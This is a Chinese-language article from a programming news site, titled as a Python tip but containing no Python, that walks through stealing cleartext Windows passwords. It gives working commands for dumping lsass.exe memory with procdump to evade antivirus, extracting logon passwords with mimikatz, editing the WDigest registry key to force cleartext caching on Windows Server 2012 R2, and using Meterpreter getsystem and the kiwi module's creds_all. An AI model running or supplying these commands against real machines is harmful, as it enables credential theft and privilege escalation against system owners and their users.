返回顶部
首页 > 资讯 > 后端开发 > Python >python简单直接获取windows明文密码操作技巧
  • 448
分享到

python简单直接获取windows明文密码操作技巧

2024-04-02 19:04:59 448人浏览 八月长安

Python 官方文档:入门教程 => 点击学习

摘要

目录01、Procdump+Mimikatz02、Window 2012 R2抓取密码03、MSF kiwi模块01、Procdump+Mimikatz 利用procdump+Mi

01、Procdump+Mimikatz

利用procdump+Mimikatz 绕过杀软获取windows明文密码。

(1)工具准备:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz:

Https://GitHub.com/gentilkiwi/mimikatz/

(2)Windows Server 2008 R2提取明文密码

在目标机器上生成存储文件:


procdump64.exe -accepteula -ma lsass.exe lsass.dmp

28ff828ad9dc41f836b56f21c0539199.png

将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。


mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::loGonpassWords" "exit"> pssword.txt

如图:成功从内存中提取明文密码。

313f61ce69afdb6dd81d5799061cc2b3.png

02、Window 2012 R2抓取密码

在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

(1)修改注册表


reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)用户administrator注销后重新登录,成功抓取到明文信息。


mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

6bf5bf93d637794f12177436ca146737.png

03、MSF kiwi模块

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。


meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加载kiwi模块:


load kiwi

列举系统中的明文密码:


creds_all

cdc6292a7aaba1f4ba86e7b526fe55ae.png

以上就是python简单直接获取windows明文密码操作技巧的详细内容,更多关于Python获取windows明文密码的资料请关注编程网其它相关文章!

--结束END--

本文标题: python简单直接获取windows明文密码操作技巧

本文链接: https://lsjlt.com/news/154489.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作